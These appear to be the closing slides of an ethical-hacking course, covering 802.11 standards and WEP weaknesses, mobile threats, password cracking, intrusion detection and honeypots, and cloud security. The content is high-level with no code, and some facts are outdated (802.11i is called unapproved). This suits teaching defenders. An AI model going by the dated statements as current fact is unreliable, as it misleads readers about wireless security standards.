• Automated tools for SQL injection
• Countermeasures to SQL injection
300
15: Hacking WiFi
and Bluetooth

301
802.11
• IEEE group responsible for defining interface between
wireless clients and their network access points in
wireless LANs
• First wireless standard was defined in 1997
• Standard was responsible for defining three types of
transmission at the Physical layer
• Diffused infrared : infrared transmission-based
• Direct sequence spread spectrum (DSSS): radio-based
• Frequency hopping spread spectrum (FHSS): radio-
based
302
802.11
• Specified WEP as an optional security protocol
• Specified use of 2.4 GHz industrial, scientific, and
medical (ISM) radio band
• Mandated 1 Mbps data transfer rate and optional 2
Mbps data transfer rate
• Most prominent working groups: 802.11b, 802.11a,
802.11i, and 802.11g

303
A Look at 802.11a
• Sets specifications for wireless data transmission of
up to 54 Mbps in the 5 GHz band
• Uses an orthogonal frequency division multiplexing
encoding scheme rather than FHSS or DSSS
• Approved in 1999
• Typically restricted to corporate deployments

304
A Look at 802.11b
• Establishes specifications for data transmission that
provides 11 Mbps transmission at 2.4 GHz band
• Sometimes referred to as “WiFi” when associated
with WECA-certified devices
• Uses only DSSS
• Approved in 1999
• First widely adopted wireless standard
• Deployed in home, small businesses, and corporations
• Being supplanted slowly by 802.11g and 802.11n
305
A Look at 802.11g
• Responsible for providing raw data throughput
over wireless networks at a throughput rate of
22 Mbps or more
• Draft created in January 2002; final approval in
2003
• Replaced 802.11b in many wireless deployments

306
A Look at 802.11i
• Responsible for fixing security flaws in WEP and
802.1x
• Hopes to eliminate WEP altogether and replace it
with Temporal Key Integrity Protocol (TKIP)
• Ongoing; not yet approved

307
Wired Equivalent Privacy (WEP)
• Optional security protocol for wireless local area
networks defined in the 802.11b standard
• Designed to provide same level of security as a wired
LAN
• Not considered adequate security without also
implementing a separate authentication process and
providing for external key management

308
Wireless LAN (WLAN)
• Connects clients to network resources using
radio signals to pass data through the ether
• Employs wireless access points (APs)
• Connected to the wired LAN
• Acts as radio broadcast stations that transmit
data to clients equipped with wireless network
interface cards (NICs)

309
How WEP Functions
• Employs a symmetric key to authenticate wireless
devices and to guarantee integrity of data by
encrypting transmissions
• Each of the APs and clients must share the same key
• Client sends a request to the AP asking for
permission to access the wired network

310
How WEP Works
• If WEP has not been enabled (default), the AP
allows the request to pass.
• If WEP has been enabled, the client begins a
challenge-and-response authentication process.

311
Vulnerabilities of WEP
• Problems related to the initialization vector (IV)
that it uses to encrypt data and ensure its
integrity
• Can be picked up by hackers
• Is reused on a regular basis
• Problems with how it handles keys
• Advanced techniques employed by hackers can
breech WEP in less than 30 seconds

312
Other WLAN Security Loopholes
• “War” techniques:
• War driving
• War flying
• War walking
• War ballooning
• Unauthorized users can attach themselves to WLANs
and use their resources, set up their own access
points, and jam the network.
• WEP authenticates clients, not users.
• Wireless network administrators and users must be
educated about inherent insecurity of wireless
systems and the need for care.
313
Conducting a Wireless Site Survey
1. Conduct a needs assessment of network users.
2. Obtain a copy of the site’s blueprint.
3. Do a walk-through of the site.
4. Identify possible access point locations.
5. Verify access point locations.
6. Document findings.

314
Summary
• The Many Faces of 802.11
• The Role of Wireless Application Protocol (WAP)
• Wired Equivalent Privacy (WEP)

315
16: Mobile Device
Security

316
Overview
• Quick Overview of Mobile Devices
• Mobile Threats and Attacks
• Countermeasures

317
Overview of Mobile Devices
• Mobile devices
–Mainly smartphones, tablets
• Sensors: GPS, camera, accelerometer, etc.
• Mobile hardware
• Mobile software

318
Mobile Threats and Attacks
• Data Leakage
• Unsecured Wi-Fi
• Network Spoofing
• Phishing attacks
• Spyware
• Broken cryptography

319
Device Malware
• iOS malware: very little
• Android malware growth keeps increasing
• Main categories:
• Trojans
• Monitoring apps/spyware
• Adware
• Botnets

320
Location Disclosure
• MAC, Bluetooth Addresses, IMEI, IMSI, etc. are
globally unique
• Infrastructure based mobile communication
• Peer-to-Peer ad hoc mobile communication

321
Mobile Access Control
• Very easy for attacker to control a mobile device
if he/she has physical access
• Especially if there’s no way to authenticate user
• Tempting target for thieves
• Theft of mobile devices increasing
• Need access controls for mobile devices

322
Authentication: Categories
•Authentication generally based on:
• Something supplicant knows
• Password/passphrase
• Unlock pattern
• Something supplicant has
• Magnetic key card
• Smart card
• Token device
• Something supplicant is
• Fingerprint
• Retina scan 323
Password Cracking
• Passwords are the most widely used form of
authentication
• Usernames and passwords are a commonly targeted
item
• Enumeration may have gathered usernames in some
cases
• Password cracking is used to obtain passwords
• Password cracking refers to a group of techniques
• Is an essential skill for penetration testers
324
What Makes a Password Susceptible to Cracking?
• Passwords that contain letters, special characters, and numbers:
stud@52
• Passwords that contain only numbers: 23698217
• Passwords that contain only special characters: &*#@!(%)
• Passwords that contain letters and numbers: meetl23
• Passwords that contain only uppercase or only lowercase: POTHMYDE
• Passwords that contain only letters and special characters: rex@&ba
• Passwords that contain only special characters and numbers: 123@$4
• Passwords of 11 characters or less

325
An Overview of Malware
• Malware
• Malware is an umbrella term for several forms of
bad software
• Malware has become more destructive and
stealthy
• Has evolved to more readily steal information
• May be useful, but potentially risky to use during a
test

326
Forms of Malware
• Viruses
• Worms
• Trojan Horses
• Rootkits
• Spyware
• Adware
• Ransomware

327
Summary
• Mobile devices are increasingly popular
• There are many threats and attacks against
mobile devices, (e.g., loss/theft, sensitive
information leakage, and location privacy
compromise)
• Mobile access control, information leakage
protection, and location privacy protection, etc.

328
17: Evasion

329
Intrusion Detection System (IDS)
• Detects malicious activity in computer systems
• Identifies and stops attacks in progress
• Conducts forensic analysis once attack is over

330
The Value of IDS
• Monitors network resources to detect intrusions
and attacks that were not stopped by preventative
techniques (firewalls, packet-filtering routers,
proxy servers)
• Compares traffic to signature files that recognize
specific known types of attack
• Expands available options to manage risk from
threats and vulnerabilities

331
Difficulties with IDS
• IDS must correctly identify intrusions and attacks
• True positives
• True negatives
• False negatives
• IDS missed an attack
• False positives
• Benign activity reported as malicious

332
Handling False Negatives and Positives
• False negatives
• Obtain more coverage by using a combination of
network-based and host-based IDS
• Deploy NIDS at multiple strategic locations in the
network
• False positives
• Reduce number using the tuning process

333
Types of IDS
• Network-based IDS (NIDS)
• Monitors network traffic
• Provides early warning system for attacks
• Host-based IDS (HIDS)
• Monitors activity on host machine
• Able to stop compromises while they are in
progress

334
NIDS
• Uses a dedicated platform for purpose of
monitoring network activity
• Analyzes all passing traffic
• Sensors have two network connections
• One operates in promiscuous mode to sniff passing
traffic.
• An administrative NIC sends data such as alerts to a
centralized management system.
• Most commonly employed form of IDS
335
NIDS Architecture
• Place IDS sensors strategically to defend most
valuable assets
• Typical locations of IDS sensors
• Just inside the firewall
• On the DMZ
• On any subnets containing mission-critical servers

336
NIDS Signature Types
• Signature-based IDS
• Looks for patterns in packet payloads that indicate a
possible attack
• Port signature
• Watches for connection attempts to a known or
frequently attacked port
• Header signatures
• Watch for dangerous or illogical combinations in packet
headers

337
NIDS Reactions
• TCP resets
• IP session logging
• Shunning or blocking

338
Host-Based IDS (HIDS)
• Primarily used to protect only critical servers
• Software agent resides on the protected system
• Detects intrusions by analyzing logs of operating
systems and applications, resource utilization,
and other system activity
• Use of resources can have impact on system
performance

339
HIDS Method of Operation
• Auditing logs (system logs, event logs, security logs,
syslog)
• Monitoring file checksums to identify changes
• Elementary network-based signature techniques
including port activity
• Intercepting and evaluating requests by applications
for system resources before they are processed
• Monitoring of system processes for suspicious
activity
340
HIDS Active Monitoring Capabilities
• Log the event.
• Alert the administrator.
• Terminate the user login.
• Disable the user account.

341
Passive Detection Systems
• Can take passive action (logging and alerting)
when an attack is identified
• Cannot take active actions to stop an attack in
progress

342
Active Detection Systems
• Have logging, alerting, and recording features of
passive IDS, with additional ability to take action
against offending traffic
• Options
• IDS shunning or blocking
• TCP reset
• Used in networks where IDS administrator has
carefully tuned the sensor’s behavior to
minimize number of false positive alarms
343
Signature and Anomaly-Based IDS
• Signature detections
• Also known as misuse detection
• IDS analyzes information it gathers and compares it
to a database of known attacks, which are
identified by their individual signatures
• Anomaly detection
• Creates a model of normal use and looks for activity
that does not conform to that model

344
Honeypots
• False systems that lure intruders and that gather
information on methods and techniques they
use to penetrate networks—by purposely
becoming victims of their attacks
• Simulate unsecured network services
• Make forensic process easy for investigators

345
Honeypot Deployment Goals
• Goal
• Gather information on hacker techniques,
methodology, and tools
• Deployed for
• Conducting research into hacker methods
• Detecting attacker inside organization’s network
perimeter

346
Commercial Honeypots
• ManTrap
• Specter
• Smoke Detector
• NetFacade

347
Honeypot Deployment Options
• For research purposes
• Directly connect a honeypot to the Internet,
allowing the owner to collect the most data
• For organizational security
• Deploy inside the network where it can serve to
detect attackers and alert security administrators to
their presence

348
Honeypot Design
• Must attract, and avoid tipping off, the attacker
• Must not become a staging ground for attacking
other hosts inside or outside the firewall

349
Summary
• Explained intrusion detection systems and identified some
of the major characteristics of intrusion detection products
• Detailed the differences between host-based and network-
based intrusion detection
• Identified active detection and passive detection features of
both host- and network-based IDS products
• Explained honeypots and how they are employed to
increase network security
• Outlined the proper response to an attack

350
18: Cloud
Technologies and
Security

351
Cloud Computing Service Models
• Software as a Service (SaaS)
• Examples: Office 365 or Gmail
• Eliminates the need to install and maintain applications
on individual computers
• Platform as a Service (PaaS)
• Software developers use PaaS as a framework on which
to build applications OSs, servers, storage, managed by
someone else
• Infrastructure as a Service (IaaS)
• Self-service model with access to configure and use all
levels of infrastructure down to the server 352
Types of Cloud Solutions
• Public Cloud
• External, hosted by a third party
• Security issue: control by a third party may be an unacceptable risk
• Private Cloud
• Built by an individual company for their use only
• Retains control of security and data
• Hybrid
• Combines public and private
• May store sensitive data on private cloud while using size and scale of
public cloud for less sensitive data
• Community Cloud
• Shared by several organizations with common needs and security goals
353
Security Threats in the Cloud
• Large data breaches more common
• Data loss (data might not just be copied and
stolen but inadvertently deleted)
• Accounts and services may be hijacked and
credentials intercepted
• Cloud APIs may be insecure
• DoS also affects cloud

354
More Security Threats in the Cloud
• Malicious insiders or poor security practices at the
cloud service
• Use of cloud services by attackers to scale their
attacks
• Multitenancy
• Various clients reside on the same machine.
• A flaw in implementation could compromise security.
• Laws and Regulations
• The consumer retains the ultimate responsibility for
compliance.
355
Cloud Computing Attacks
• Session Riding (aka Cross-Site Request Forgery)
• Tricks a user into running request that runs with
their privileges and context
• Side Channel Attacks
• Potentially devastating but requires skill and luck by
the attacker
• Signature Wrapping Attacks
• Relies on altering web service SOAP and XML
content but preserving the ID

356
Controls for Cloud Security
• Secure design and architecture are key
• Identity and access management as important or
more important in the cloud
• Governance (ensures that the policies, procedures,
and standards are deployed and enforced)
• Risk management and compliance
• Consider availability and uptime QoS/SLA of your
cloud provider

357
Testing Security in the Cloud
• SOASTA CloudTest
• LoadStorm
• BlazeMeter
• Nexpose
• AppThwack
• Jenkins Dev@Cloud
• Xamarin Test Cloud

358
Quiz Time

359
Thank you

360